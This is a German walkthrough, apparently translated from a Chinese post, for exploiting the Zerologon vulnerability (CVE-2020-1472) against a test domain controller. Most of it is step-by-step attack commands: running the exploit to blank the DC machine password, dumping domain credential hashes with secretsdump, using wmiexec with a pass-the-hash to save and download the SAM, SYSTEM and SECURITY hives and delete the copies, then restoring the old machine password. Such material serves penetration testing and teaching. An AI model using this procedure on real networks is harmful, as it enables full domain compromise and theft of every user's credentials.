
Exploit für CVE-2020-1472 (Zerologon), der das Maschinenkennwort des Domänencontrollers zurücksetzt und so Credential-Dumping und Privilegieneskalation zum Domänenadministrator ermöglicht.
@toc
Das Prinzip der Schwachstelle ist relativ komplex. Wenn Sie interessiert sind, können Sie den Artikel unter dem folgenden Link ansehen: https://www.freebuf.com/articles/system/249860.html
Es muss die Datei https://github.com/SecureAuthCorp/impacket/edit/master/impacket/dcerpc/v5/nrpc.py verwendet werden, um die lokale nrpc-Datei zu ersetzen. Der Speicherpfad der lokalen nrpc-Datei lautet: C:\Users\Administrator\AppData\Local\Programs\Python\Python38\Lib\site-packages\impacket\dcerpc\v5\nrpc.py
python cve-2020-1472-exploit.py 机器账户名 ip
Außerdem wird festgestellt, dass das Passwort des Maschinenkontos bereits geleert wurde. 31dc... steht für ein leeres Passwort.

So erhält man den Maschinenkontonamen bzw. den NetBIOS-Namen des Gegners:
- net view
Der Servername mit $ ist der Maschinenname, z. B. lisi$ oder yukong$.
- nbtstat -A ip
Es gibt viele Möglichkeiten, die IP des Domain Controllers zu ermitteln, zum Beispiel:
- Nach Hosts suchen, auf denen Port 53 geöffnet ist.
- net time liefert in der Ausgabe den Hostnamen des Domain Controllers, dann einfach ping ausführen.
- Mit dem Befehl systeminfo den Wert im Bereich „Domäne“ anzeigen, dann ping ausführen – das ist die IP des Domain Controllers.
- DNS des eigenen Hosts anzeigen.
python secretsdump.py test.com/[email protected] -no-pass
Es zeigt sich, dass man mit dem Maschinenkonto mit leerem Passwort die Benutzer-Hashes auf dem Domain Controller auslesen kann.
python wmiexec.py -hashes :3dbde697d71690a769204beb12283678 test/[email protected] reg save HKLM\SYSTEM system.save reg save HKLM\SAM sam.save reg save HKLM\SECURITY security.save
get system.save get sam.save get security.save
del /f system.save del /f sam.save del /f security.save
exit
Nach der Ausführung befinden sich die heruntergeladenen Dateien in dem Ordner, in dem sich das wmiexec-Skript befindet:

python secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 test.com/[email protected] -use-vss Die Ausführung dieses Befehls schlägt fehl.
python secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
Speichern Sie das im roten Kreis markierte Passwort. Dies ist das frühere Maschinenpasswort, nämlich aad3b435b51404eeaad3b435b51404ee:999699ceadecae87fef9a2040ef2213a.
python reinstall_original_pw.py yukong$ 192.168.124.142 999699ceadecae87fef9a2040ef2213a

python secretsdump.py test.com/administrator:[email protected] -just-dc-user yukong$
python secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:3dbde697d71690a769204beb12283678 test/[email protected] -just-dc-user yukong$
Die Wiederherstellung war erfolgreich.